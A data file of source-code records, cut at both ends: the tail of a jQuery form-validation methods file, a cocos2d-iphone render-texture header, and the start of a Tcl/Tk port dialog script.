/^((([0-9A-Fa-f]{1,4}:){7}[0-9A-Fa-f]{1,4})|(([0-9A-Fa-f]{1,4}:){6}:[0-9A-Fa-f]{1,4})|(([0-9A-Fa-f]{1,4}:){5}:([0-9A-Fa-f]{1,4}:)?[0-9A-Fa-f]{1,4})|(([0-9A-Fa-f]{1,4}:){4}:([0-9A-Fa-f]{1,4}:){0,2}[0-9A-Fa-f]{1,4})|(([0-9A-Fa-f]{1,4}:){3}:([0-9A-Fa-f]{1,4}:){0,3}[0-9A-Fa-f]{1,4})|(([0-9A-Fa-f]{1,4}:){2}:([0-9A-Fa-f]{1,4}:){0,4}[0-9A-Fa-f]{1,4})|(([0-9A-Fa-f]{1,4}:){6}((\\b((25[0-5])|(1\\d{2})|(2[0-4]\\d)|(\\d{1,2}))\\b)\\.){3}(\\b((25[0-5])|(1\\d{2})|(2[0-4]\\d)|(\\d{1,2}))\\b))|(([0-9A-Fa-f]{1,4}:){0,5}:((\\b((25[0-5])|(1\\d{2})|(2[0-4]\\d)|(\\d{1,2}))\\b)\\.){3}(\\b((25[0-5])|(1\\d{2})|(2[0-4]\\d)|(\\d{1,2}))\\b))|(::([0-9A-Fa-f]{1,4}:){0,5}((\\b((25[0-5])|(1\\d{2})|(2[0-4]\\d)|(\\d{1,2}))\\b)\\.){3}(\\b((25[0-5])|(1\\d{2})|(2[0-4]\\d)|(\\d{1,2}))\\b))|([0-9A-Fa-f]{1,4}::([0-9A-Fa-f]{1,4}:){0,5}[0-9A-Fa-f]{1,4})|(::([0-9A-Fa-f]{1,4}:){0,6}[0-9A-Fa-f]{1,4})|(([0-9A-Fa-f]{1,4}:){1,7}:))$/i.test(value);\n}, \"Please enter a valid IP v6 address.\");\n\n$.validator.addMethod(\"lettersonly\", function(value, element) {\n\treturn this.optional(element) || /^[a-z]+$/i.test(value);\n}, \"Letters only please\");\n\n$.validator.addMethod(\"letterswithbasicpunc\", function(value, element) {\n\treturn this.optional(element) || /^[a-z\\-.,()'\"\\s]+$/i.test(value);\n}, \"Letters or punctuation only please\");\n\n$.validator.addMethod(\"mobileNL\", function(value, element) {\n\treturn this.optional(element) || /^((\\+|00(\\s|\\s?\\-\\s?)?)31(\\s|\\s?\\-\\s?)?(\\(0\\)[\\-\\s]?)?|0)6((\\s|\\s?\\-\\s?)?[0-9]){8}$/.test(value);\n}, \"Please specify a valid mobile number\");\n\n/* For UK phone functions, do the following server side processing:\n * Compare original input with this RegEx pattern:\n * ^\\(?(?:(?:00\\)?[\\s\\-]?\\(?|\\+)(44)\\)?[\\s\\-]?\\(?(?:0\\)?[\\s\\-]?\\(?)?|0)([1-9]\\d{1,4}\\)?[\\s\\d\\-]+)$\n * Extract $1 and set $prefix to '+44' if $1 is '44', otherwise set $prefix to '0'\n * Extract $2 and remove hyphens, spaces and parentheses. Phone number is combined $prefix and $2.\n * A number of very detailed GB telephone number RegEx patterns can also be found at:\n * http://www.aa-asterisk.org.uk/index.php/Regular_Expressions_for_Validating_and_Formatting_GB_Telephone_Numbers\n */\n$.validator.addMethod(\"mobileUK\", function(phone_number, element) {\n\tphone_number = phone_number.replace(/\\(|\\)|\\s+|-/g, \"\");\n\treturn this.optional(element) || phone_number.length > 9 &&\n\t\tphone_number.match(/^(?:(?:(?:00\\s?|\\+)44\\s?|0)7(?:[1345789]\\d{2}|624)\\s?\\d{3}\\s?\\d{3})$/);\n}, \"Please specify a valid mobile number\");\n\n/*\n * The número de identidad de extranjero ( NIE )is a code used to identify the non-nationals in Spain\n */\n$.validator.addMethod( \"nieES\", function( value ) {\n\t\"use strict\";\n\n\tvalue = value.toUpperCase();\n\n\t// Basic format test\n\tif ( !value.match( \"((^[A-Z]{1}[0-9]{7}[A-Z0-9]{1}$|^[T]{1}[A-Z0-9]{8}$)|^[0-9]{8}[A-Z]{1}$)\" ) ) {\n\t\treturn false;\n\t}\n\n\t// Test NIE\n\t//T\n\tif ( /^[T]{1}/.test( value ) ) {\n\t\treturn ( value[ 8 ] === /^[T]{1}[A-Z0-9]{8}$/.test( value ) );\n\t}\n\n\t//XYZ\n\tif ( /^[XYZ]{1}/.test( value ) ) {\n\t\treturn (\n\t\t\tvalue[ 8 ] === \"TRWAGMYFPDXBNJZSQVHLCKE\".charAt(\n\t\t\t\tvalue.replace( \"X\", \"0\" )\n\t\t\t\t\t.replace( \"Y\", \"1\" )\n\t\t\t\t\t.replace( \"Z\", \"2\" )\n\t\t\t\t\t.substring( 0, 8 ) % 23\n\t\t\t)\n\t\t);\n\t}\n\n\treturn false;\n\n}, \"Please specify a valid NIE number.\" );\n\n/*\n * The Número de Identificación Fiscal ( NIF ) is the way tax identification used in Spain for individuals\n */\n$.validator.addMethod( \"nifES\", function( value ) {\n\t\"use strict\";\n\n\tvalue = value.toUpperCase();\n\n\t// Basic format test\n\tif ( !value.match(\"((^[A-Z]{1}[0-9]{7}[A-Z0-9]{1}$|^[T]{1}[A-Z0-9]{8}$)|^[0-9]{8}[A-Z]{1}$)\") ) {\n\t\treturn false;\n\t}\n\n\t// Test NIF\n\tif ( /^[0-9]{8}[A-Z]{1}$/.test( value ) ) {\n\t\treturn ( \"TRWAGMYFPDXBNJZSQVHLCKE\".charAt( value.substring( 8, 0 ) % 23 ) === value.charAt( 8 ) );\n\t}\n\t// Test specials NIF (starts with K, L or M)\n\tif ( /^[KLM]{1}/.test( value ) ) {\n\t\treturn ( value[ 8 ] === String.fromCharCode( 64 ) );\n\t}\n\n\treturn false;\n\n}, \"Please specify a valid NIF number.\" );\n\njQuery.validator.addMethod( \"notEqualTo\", function( value, element, param ) {\n\treturn this.optional(element) || !$.validator.methods.equalTo.call( this, value, element, param );\n}, \"Please enter a different value, values must not be the same.\" );\n\n$.validator.addMethod(\"nowhitespace\", function(value, element) {\n\treturn this.optional(element) || /^\\S+$/i.test(value);\n}, \"No white space please\");\n\n/**\n* Return true if the field value matches the given format RegExp\n*\n* @example $.validator.methods.pattern(\"AR1004\",element,/^AR\\d{4}$/)\n* @result true\n*\n* @example $.validator.methods.pattern(\"BR1004\",element,/^AR\\d{4}$/)\n* @result false\n*\n* @name $.validator.methods.pattern\n* @type Boolean\n* @cat Plugins/Validate/Methods\n*/\n$.validator.addMethod(\"pattern\", function(value, element, param) {\n\tif (this.optional(element)) {\n\t\treturn true;\n\t}\n\tif (typeof param === \"string\") {\n\t\tparam = new RegExp(\"^(?:\" + param + \")$\");\n\t}\n\treturn param.test(value);\n}, \"Invalid format.\");\n\n/**\n * Dutch phone numbers have 10 digits (or 11 and start with +31).\n */\n$.validator.addMethod(\"phoneNL\", function(value, element) {\n\treturn this.optional(element) || /^((\\+|00(\\s|\\s?\\-\\s?)?)31(\\s|\\s?\\-\\s?)?(\\(0\\)[\\-\\s]?)?|0)[1-9]((\\s|\\s?\\-\\s?)?[0-9]){8}$/.test(value);\n}, \"Please specify a valid phone number.\");\n\n/* For UK phone functions, do the following server side processing:\n * Compare original input with this RegEx pattern:\n * ^\\(?(?:(?:00\\)?[\\s\\-]?\\(?|\\+)(44)\\)?[\\s\\-]?\\(?(?:0\\)?[\\s\\-]?\\(?)?|0)([1-9]\\d{1,4}\\)?[\\s\\d\\-]+)$\n * Extract $1 and set $prefix to '+44' if $1 is '44', otherwise set $prefix to '0'\n * Extract $2 and remove hyphens, spaces and parentheses. Phone number is combined $prefix and $2.\n * A number of very detailed GB telephone number RegEx patterns can also be found at:\n * http://www.aa-asterisk.org.uk/index.php/Regular_Expressions_for_Validating_and_Formatting_GB_Telephone_Numbers\n */\n$.validator.addMethod(\"phoneUK\", function(phone_number, element) {\n\tphone_number = phone_number.replace(/\\(|\\)|\\s+|-/g, \"\");\n\treturn this.optional(element) || phone_number.length > 9 &&\n\t\tphone_number.match(/^(?:(?:(?:00\\s?|\\+)44\\s?)|(?:\\(?0))(?:\\d{2}\\)?\\s?\\d{4}\\s?\\d{4}|\\d{3}\\)?\\s?\\d{3}\\s?\\d{3,4}|\\d{4}\\)?\\s?(?:\\d{5}|\\d{3}\\s?\\d{3})|\\d{5}\\)?\\s?\\d{4,5})$/);\n}, \"Please specify a valid phone number\");\n\n/**\n * matches US phone number format\n *\n * where the area code may not start with 1 and the prefix may not start with 1\n * allows '-' or ' ' as a separator and allows parens around area code\n * some people may want to put a '1' in front of their number\n *\n * 1(212)-999-2345 or\n * 212 999 2344 or\n * 212-999-0983\n *\n * but not\n * 111-123-5434\n * and not\n * 212 123 4567\n */\n$.validator.addMethod(\"phoneUS\", function(phone_number, element) {\n\tphone_number = phone_number.replace(/\\s+/g, \"\");\n\treturn this.optional(element) || phone_number.length > 9 &&\n\t\tphone_number.match(/^(\\+?1-?)?(\\([2-9]([02-9]\\d|1[02-9])\\)|[2-9]([02-9]\\d|1[02-9]))-?[2-9]([02-9]\\d|1[02-9])-?\\d{4}$/);\n}, \"Please specify a valid phone number\");\n\n/* For UK phone functions, do the following server side processing:\n * Compare original input with this RegEx pattern:\n * ^\\(?(?:(?:00\\)?[\\s\\-]?\\(?|\\+)(44)\\)?[\\s\\-]?\\(?(?:0\\)?[\\s\\-]?\\(?)?|0)([1-9]\\d{1,4}\\)?[\\s\\d\\-]+)$\n * Extract $1 and set $prefix to '+44' if $1 is '44', otherwise set $prefix to '0'\n * Extract $2 and remove hyphens, spaces and parentheses. Phone number is combined $prefix and $2.\n * A number of very detailed GB telephone number RegEx patterns can also be found at:\n * http://www.aa-asterisk.org.uk/index.php/Regular_Expressions_for_Validating_and_Formatting_GB_Telephone_Numbers\n */\n//Matches UK landline + mobile, accepting only 01-3 for landline or 07 for mobile to exclude many premium numbers\n$.validator.addMethod(\"phonesUK\", function(phone_number, element) {\n\tphone_number = phone_number.replace(/\\(|\\)|\\s+|-/g, \"\");\n\treturn this.optional(element) || phone_number.length > 9 &&\n\t\tphone_number.match(/^(?:(?:(?:00\\s?|\\+)44\\s?|0)(?:1\\d{8,9}|[23]\\d{9}|7(?:[1345789]\\d{8}|624\\d{6})))$/);\n}, \"Please specify a valid uk phone number\");\n\n/**\n * Matches a valid Canadian Postal Code\n *\n * @example jQuery.validator.methods.postalCodeCA( \"H0H 0H0\", element )\n * @result true\n *\n * @example jQuery.validator.methods.postalCodeCA( \"H0H0H0\", element )\n * @result false\n *\n * @name jQuery.validator.methods.postalCodeCA\n * @type Boolean\n * @cat Plugins/Validate/Methods\n */\n$.validator.addMethod( \"postalCodeCA\", function( value, element ) {\n\treturn this.optional( element ) || /^[ABCEGHJKLMNPRSTVXY]\\d[A-Z] \\d[A-Z]\\d$/.test( value );\n}, \"Please specify a valid postal code\" );\n\n/*\n* Valida CEPs do brasileiros:\n*\n* Formatos aceitos:\n* 99999-999\n* 99.999-999\n* 99999999\n*/\n$.validator.addMethod(\"postalcodeBR\", function(cep_value, element) {\n\treturn this.optional(element) || /^\\d{2}.\\d{3}-\\d{3}?$|^\\d{5}-?\\d{3}?$/.test( cep_value );\n}, \"Informe um CEP válido.\");\n\n/* Matches Italian postcode (CAP) */\n$.validator.addMethod(\"postalcodeIT\", function(value, element) {\n\treturn this.optional(element) || /^\\d{5}$/.test(value);\n}, \"Please specify a valid postal code\");\n\n$.validator.addMethod(\"postalcodeNL\", function(value, element) {\n\treturn this.optional(element) || /^[1-9][0-9]{3}\\s?[a-zA-Z]{2}$/.test(value);\n}, \"Please specify a valid postal code\");\n\n// Matches UK postcode. Does not match to UK Channel Islands that have their own postcodes (non standard UK)\n$.validator.addMethod(\"postcodeUK\", function(value, element) {\n\treturn this.optional(element) || /^((([A-PR-UWYZ][0-9])|([A-PR-UWYZ][0-9][0-9])|([A-PR-UWYZ][A-HK-Y][0-9])|([A-PR-UWYZ][A-HK-Y][0-9][0-9])|([A-PR-UWYZ][0-9][A-HJKSTUW])|([A-PR-UWYZ][A-HK-Y][0-9][ABEHMNPRVWXY]))\\s?([0-9][ABD-HJLNP-UW-Z]{2})|(GIR)\\s?(0AA))$/i.test(value);\n}, \"Please specify a valid UK postcode\");\n\n/*\n * Lets you say \"at least X inputs that match selector Y must be filled.\"\n *\n * The end result is that neither of these inputs:\n *\n *\t\n *\t\n *\n *\t...will validate unless at least one of them is filled.\n *\n * partnumber:\t{require_from_group: [1,\".productinfo\"]},\n * description: {require_from_group: [1,\".productinfo\"]}\n *\n * options[0]: number of fields that must be filled in the group\n * options[1]: CSS selector that defines the group of conditionally required fields\n */\n$.validator.addMethod(\"require_from_group\", function(value, element, options) {\n\tvar $fields = $(options[1], element.form),\n\t\t$fieldsFirst = $fields.eq(0),\n\t\tvalidator = $fieldsFirst.data(\"valid_req_grp\") ? $fieldsFirst.data(\"valid_req_grp\") : $.extend({}, this),\n\t\tisValid = $fields.filter(function() {\n\t\t\treturn validator.elementValue(this);\n\t\t}).length >= options[0];\n\n\t// Store the cloned validator for future validation\n\t$fieldsFirst.data(\"valid_req_grp\", validator);\n\n\t// If element isn't being validated, run each require_from_group field's validation rules\n\tif (!$(element).data(\"being_validated\")) {\n\t\t$fields.data(\"being_validated\", true);\n\t\t$fields.each(function() {\n\t\t\tvalidator.element(this);\n\t\t});\n\t\t$fields.data(\"being_validated\", false);\n\t}\n\treturn isValid;\n}, $.validator.format(\"Please fill at least {0} of these fields.\"));\n\n/*\n * Lets you say \"either at least X inputs that match selector Y must be filled,\n * OR they must all be skipped (left blank).\"\n *\n * The end result, is that none of these inputs:\n *\n *\t\n *\t\n *\t\n *\n *\t...will validate unless either at least two of them are filled,\n *\tOR none of them are.\n *\n * partnumber:\t{skip_or_fill_minimum: [2,\".productinfo\"]},\n * description: {skip_or_fill_minimum: [2,\".productinfo\"]},\n * color:\t\t{skip_or_fill_minimum: [2,\".productinfo\"]}\n *\n * options[0]: number of fields that must be filled in the group\n * options[1]: CSS selector that defines the group of conditionally required fields\n *\n */\n$.validator.addMethod(\"skip_or_fill_minimum\", function(value, element, options) {\n\tvar $fields = $(options[1], element.form),\n\t\t$fieldsFirst = $fields.eq(0),\n\t\tvalidator = $fieldsFirst.data(\"valid_skip\") ? $fieldsFirst.data(\"valid_skip\") : $.extend({}, this),\n\t\tnumberFilled = $fields.filter(function() {\n\t\t\treturn validator.elementValue(this);\n\t\t}).length,\n\t\tisValid = numberFilled === 0 || numberFilled >= options[0];\n\n\t// Store the cloned validator for future validation\n\t$fieldsFirst.data(\"valid_skip\", validator);\n\n\t// If element isn't being validated, run each skip_or_fill_minimum field's validation rules\n\tif (!$(element).data(\"being_validated\")) {\n\t\t$fields.data(\"being_validated\", true);\n\t\t$fields.each(function() {\n\t\t\tvalidator.element(this);\n\t\t});\n\t\t$fields.data(\"being_validated\", false);\n\t}\n\treturn isValid;\n}, $.validator.format(\"Please either skip these fields or fill at least {0} of them.\"));\n\n/* Validates US States and/or Territories by @jdforsythe\n * Can be case insensitive or require capitalization - default is case insensitive\n * Can include US Territories or not - default does not\n * Can include US Military postal abbreviations (AA, AE, AP) - default does not\n *\n * Note: \"States\" always includes DC (District of Colombia)\n *\n * Usage examples:\n *\n * This is the default - case insensitive, no territories, no military zones\n * stateInput: {\n * caseSensitive: false,\n * includeTerritories: false,\n * includeMilitary: false\n * }\n *\n * Only allow capital letters, no territories, no military zones\n * stateInput: {\n * caseSensitive: false\n * }\n *\n * Case insensitive, include territories but not military zones\n * stateInput: {\n * includeTerritories: true\n * }\n *\n * Only allow capital letters, include territories and military zones\n * stateInput: {\n * caseSensitive: true,\n * includeTerritories: true,\n * includeMilitary: true\n * }\n *\n *\n *\n */\n\n$.validator.addMethod(\"stateUS\", function(value, element, options) {\n\tvar isDefault = typeof options === \"undefined\",\n\t\tcaseSensitive = ( isDefault || typeof options.caseSensitive === \"undefined\" ) ? false : options.caseSensitive,\n\t\tincludeTerritories = ( isDefault || typeof options.includeTerritories === \"undefined\" ) ? false : options.includeTerritories,\n\t\tincludeMilitary = ( isDefault || typeof options.includeMilitary === \"undefined\" ) ? false : options.includeMilitary,\n\t\tregex;\n\n\tif (!includeTerritories && !includeMilitary) {\n\t\tregex = \"^(A[KLRZ]|C[AOT]|D[CE]|FL|GA|HI|I[ADLN]|K[SY]|LA|M[ADEINOST]|N[CDEHJMVY]|O[HKR]|PA|RI|S[CD]|T[NX]|UT|V[AT]|W[AIVY])$\";\n\t} else if (includeTerritories && includeMilitary) {\n\t\tregex = \"^(A[AEKLPRSZ]|C[AOT]|D[CE]|FL|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEINOPST]|N[CDEHJMVY]|O[HKR]|P[AR]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])$\";\n\t} else if (includeTerritories) {\n\t\tregex = \"^(A[KLRSZ]|C[AOT]|D[CE]|FL|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEINOPST]|N[CDEHJMVY]|O[HKR]|P[AR]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])$\";\n\t} else {\n\t\tregex = \"^(A[AEKLPRZ]|C[AOT]|D[CE]|FL|GA|HI|I[ADLN]|K[SY]|LA|M[ADEINOST]|N[CDEHJMVY]|O[HKR]|PA|RI|S[CD]|T[NX]|UT|V[AT]|W[AIVY])$\";\n\t}\n\n\tregex = caseSensitive ? new RegExp(regex) : new RegExp(regex, \"i\");\n\treturn this.optional(element) || regex.test(value);\n},\n\"Please specify a valid state\");\n\n// TODO check if value starts with <, otherwise don't try stripping anything\n$.validator.addMethod(\"strippedminlength\", function(value, element, param) {\n\treturn $(value).text().length >= param;\n}, $.validator.format(\"Please enter at least {0} characters\"));\n\n$.validator.addMethod(\"time\", function(value, element) {\n\treturn this.optional(element) || /^([01]\\d|2[0-3]|[0-9])(:[0-5]\\d){1,2}$/.test(value);\n}, \"Please enter a valid time, between 00:00 and 23:59\");\n\n$.validator.addMethod(\"time12h\", function(value, element) {\n\treturn this.optional(element) || /^((0?[1-9]|1[012])(:[0-5]\\d){1,2}(\\ ?[AP]M))$/i.test(value);\n}, \"Please enter a valid time in 12-hour am/pm format\");\n\n// same as url, but TLD is optional\n$.validator.addMethod(\"url2\", function(value, element) {\n\treturn this.optional(element) || /^(https?|ftp):\\/\\/(((([a-z]|\\d|-|\\.|_|~|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])|(%[\\da-f]{2})|[!\\$&'\\(\\)\\*\\+,;=]|:)*@)?(((\\d|[1-9]\\d|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d|[1-9]\\d|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d|[1-9]\\d|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d|[1-9]\\d|1\\d\\d|2[0-4]\\d|25[0-5]))|((([a-z]|\\d|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])|(([a-z]|\\d|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])([a-z]|\\d|-|\\.|_|~|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])*([a-z]|\\d|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])))\\.)*(([a-z]|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])|(([a-z]|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])([a-z]|\\d|-|\\.|_|~|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])*([a-z]|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])))\\.?)(:\\d*)?)(\\/((([a-z]|\\d|-|\\.|_|~|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])|(%[\\da-f]{2})|[!\\$&'\\(\\)\\*\\+,;=]|:|@)+(\\/(([a-z]|\\d|-|\\.|_|~|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])|(%[\\da-f]{2})|[!\\$&'\\(\\)\\*\\+,;=]|:|@)*)*)?)?(\\?((([a-z]|\\d|-|\\.|_|~|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])|(%[\\da-f]{2})|[!\\$&'\\(\\)\\*\\+,;=]|:|@)|[\\uE000-\\uF8FF]|\\/|\\?)*)?(#((([a-z]|\\d|-|\\.|_|~|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])|(%[\\da-f]{2})|[!\\$&'\\(\\)\\*\\+,;=]|:|@)|\\/|\\?)*)?$/i.test(value);\n}, $.validator.messages.url);\n\n/**\n * Return true, if the value is a valid vehicle identification number (VIN).\n *\n * Works with all kind of text inputs.\n *\n * @example \n * @desc Declares a required input element whose value must be a valid vehicle identification number.\n *\n * @name $.validator.methods.vinUS\n * @type Boolean\n * @cat Plugins/Validate/Methods\n */\n$.validator.addMethod(\"vinUS\", function(v) {\n\tif (v.length !== 17) {\n\t\treturn false;\n\t}\n\n\tvar LL = [ \"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"J\", \"K\", \"L\", \"M\", \"N\", \"P\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\" ],\n\t\tVL = [ 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 7, 9, 2, 3, 4, 5, 6, 7, 8, 9 ],\n\t\tFL = [ 8, 7, 6, 5, 4, 3, 2, 10, 0, 9, 8, 7, 6, 5, 4, 3, 2 ],\n\t\trs = 0,\n\t\ti, n, d, f, cd, cdv;\n\n\tfor (i = 0; i < 17; i++) {\n\t\tf = FL[i];\n\t\td = v.slice(i, i + 1);\n\t\tif (i === 8) {\n\t\t\tcdv = d;\n\t\t}\n\t\tif (!isNaN(d)) {\n\t\t\td *= f;\n\t\t} else {\n\t\t\tfor (n = 0; n < LL.length; n++) {\n\t\t\t\tif (d.toUpperCase() === LL[n]) {\n\t\t\t\t\td = VL[n];\n\t\t\t\t\td *= f;\n\t\t\t\t\tif (isNaN(cdv) && n === 8) {\n\t\t\t\t\t\tcdv = LL[n];\n\t\t\t\t\t}\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\trs += d;\n\t}\n\tcd = rs % 11;\n\tif (cd === 10) {\n\t\tcd = \"X\";\n\t}\n\tif (cd === cdv) {\n\t\treturn true;\n\t}\n\treturn false;\n}, \"The specified vehicle identification number (VIN) is invalid.\");\n\n$.validator.addMethod(\"zipcodeUS\", function(value, element) {\n\treturn this.optional(element) || /^\\d{5}(-\\d{4})?$/.test(value);\n}, \"The specified US ZIP Code is invalid\");\n\n$.validator.addMethod(\"ziprange\", function(value, element) {\n\treturn this.optional(element) || /^90[2-5]\\d\\{2\\}-\\d{4}$/.test(value);\n}, \"Your ZIP-code must be in the range 902xx-xxxx to 905xx-xxxx\");\n\n}));"} {"text": "/*\n * cocos2d for iPhone: http://www.cocos2d-iphone.org\n *\n * Copyright (c) 2009 Jason Booth\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n * \n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n * \n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n *\n */\n\n#import \n#import \"CCNode.h\"\n#import \"CCSprite.h\"\n#import \"Support/OpenGL_Internal.h\"\n\n#import \n#ifdef __IPHONE_OS_VERSION_MAX_ALLOWED\n#import \n#endif // iPHone\n\nenum \n{\n\tkCCImageFormatJPG = 0,\n\tkCCImageFormatPNG = 1,\n\tkCCImageFormatRawData =2\n};\n\n\n/**\n CCRenderTexture is a generic rendering target. To render things into it,\n simply construct a render target, call begin on it, call visit on any cocos\n scenes or objects to render them, and call end. For convienience, render texture\n adds a sprite as it's display child with the results, so you can simply add\n the render texture to your scene and treat it like any other CocosNode.\n There are also functions for saving the render texture to disk in PNG or JPG format.\n \n @since v0.8.1\n */\n@interface CCRenderTexture : CCNode \n{\n\tGLuint\t\t\t\tfbo_;\n\tGLint\t\t\t\toldFBO_;\n\tCCTexture2D*\t\ttexture_;\n\tCCSprite*\t\t\tsprite_;\n\t\n\tGLenum\t\t\t\tpixelFormat_;\n\tGLfloat\t\t\t\tclearColor_[4];\n\n}\n\n/** The CCSprite being used.\n The sprite, by default, will use the following blending function: GL_ONE, GL_ONE_MINUS_SRC_ALPHA.\n The blending function can be changed in runtime by calling:\n\t- [[renderTexture sprite] setBlendFunc:(ccBlendFunc){GL_ONE, GL_ONE_MINUS_SRC_ALPHA}];\n*/\n@property (nonatomic,readwrite, assign) CCSprite* sprite;\n\n/** creates a RenderTexture object with width and height in Points and a pixel format, only RGB and RGBA formats are valid */\n+(id)renderTextureWithWidth:(int)w height:(int)h pixelFormat:(CCTexture2DPixelFormat) format;\n\n/** creates a RenderTexture object with width and height in Points, pixel format is RGBA8888 */\n+(id)renderTextureWithWidth:(int)w height:(int)h;\n\n/** initializes a RenderTexture object with width and height in Points and a pixel format, only RGB and RGBA formats are valid */\n-(id)initWithWidth:(int)w height:(int)h pixelFormat:(CCTexture2DPixelFormat) format;\n\n/** starts grabbing */\n-(void)begin;\n\n/** starts rendering to the texture while clearing the texture first.\n This is more efficient then calling -clear first and then -begin */\n-(void)beginWithClear:(float)r g:(float)g b:(float)b a:(float)a;\n\n/** ends grabbing */\n-(void)end;\n\n/** clears the texture with a color */\n-(void)clear:(float)r g:(float)g b:(float)b a:(float)a;\n\n#ifdef __IPHONE_OS_VERSION_MAX_ALLOWED\n\n/** saves the texture into a file */\n-(BOOL)saveBuffer:(NSString*)name;\n/** saves the texture into a file. The format can be JPG or PNG */\n-(BOOL)saveBuffer:(NSString*)name format:(int)format;\n/* get buffer as UIImage, can only save a render buffer which has a RGBA8888 pixel format */\n-(NSData*)getUIImageAsDataFromBuffer:(int) format;\n\n#endif // __IPHONE_OS_VERSION_MAX_ALLOWED\n\n@end\n\n\n"} {"text": "# Port.tcl --\n#\n#\tTksu procedures to handle the port dialog window.\n#\n# Copyright (C) 2002 Henry Thorson Consulting. All rights reserved.\n#\n# This program is licensed under the terms of the GNU General Public License,\n# version 2 (or any later version). See the file `COPYING' for full details,\n# and for a DISCLAIMER OF ALL WARRANTIES.\n#\n# CVS: $Id: Port.tcl,v 1.1.1.1 2002/06/07 23:43:30 jeff Exp $\n\n#-------------------------------------------------------------------------------\n# CreatePortDialog -- create port dialog.\n#\n# Args: instance\tInstance number of parameter list window.\n# Returns: null\n#\n# The parameter and port dialogs share the space below the parameter listbox\n# in the parameter list window.\n#-------------------------------------------------------------------------------\n\nproc tksu::CreatePortDialog instance {\n variable PortAction\n\n# Variable PortAction($instance) is referenced by the radio buttons.\n# It may take on the values {pipe file temp}.\n\n set PortAction($instance) pipe\n set bwid 5\n set lwid 10\n\n set w .param$instance.port\n frame $w\n label $w.title\n\n# Port action: pipe.\n\n set f $w.pipe\n frame $f\n label $f.label -text \" 1\" -underline 1\n radiobutton $f.button -anchor w \\\n \t\t\t -command \"tksu::PortToggle $instance\" \\\n \t\t\t -variable tksu::PortAction($instance) -value pipe\n entry $f.module -relief sunken -bg white -width 14 -exportselection 0\n button $f.moduleB -image DownArrow \\\n \t\t -command \"tksu::PipeModules $instance\"\n\n label $f.portlabel -text \" port:\"\n entry $f.port -relief sunken -bg white -width 10 -exportselection 0\n button $f.portB -image DownArrow \\\n \t\t -command \"tksu::PipePorts $instance\"\n\n# Port action: file.\n\n set f $w.file\n frame $f\n label $f.label -text \" 2\" -underline 1\n radiobutton $f.button -anchor w \\\n \t\t\t -command \"tksu::PortToggle $instance\" \\\n \t\t\t -variable tksu::PortAction($instance) -value file\n entry $f.entry -relief sunken -bg white -exportselection 0\n\n# Port action: temporary or null I/O.\n\n set f $w.temp\n frame $f\n label $f.label -text \" 3\" -underline 1\n radiobutton $f.button -anchor w \\\n \t\t\t -command \"tksu::PortToggle $instance\" \\\n \t\t\t -variable tksu::PortAction($instance) -value temp\n button $w.fileDialog -text File -underline 0 -width 3 \\\n\t\t\t -command \"tksu::PortFile $instance\"\n\n# Port default:\n\n set f $w.default\n frame $f\n label $f.label -text Default: -width $lwid -anchor w\n label $f.value -anchor w -justify left -wraplength 12c\n\n# Port data type:\n\n set f $w.data\n frame $f\n label $f.label -text \"File Type:\" -width $lwid -anchor w\n label $f.value -anchor w\n button $f.color -relief sunken -foreground white -width $bwid \\\n \t\t -takefocus 0\n\n# Port description:\n\n set f $w.desc\n frame $f\n label $f.label -text Description: -width $lwid -anchor w\n label $f.value -anchor w -justify left -wraplength 14c\n\n# Side buttons:\n#\n# DISABLED 5/3/02: \"-command ParamUndo $instance\" replaced with\n# \"-command Undo\", likewise for \"-command ParamRedo $instance\".\n\n button $w.enter -text Enter -underline 0 -width $bwid \\\n \t\t -command \"tksu::ParamEnter $instance\"\n button $w.undo -text Undo -underline 0 -width $bwid \\\n \t\t -command tksu::Undo\n button $w.redo -text Redo -underline 0 -width $bwid \\\n 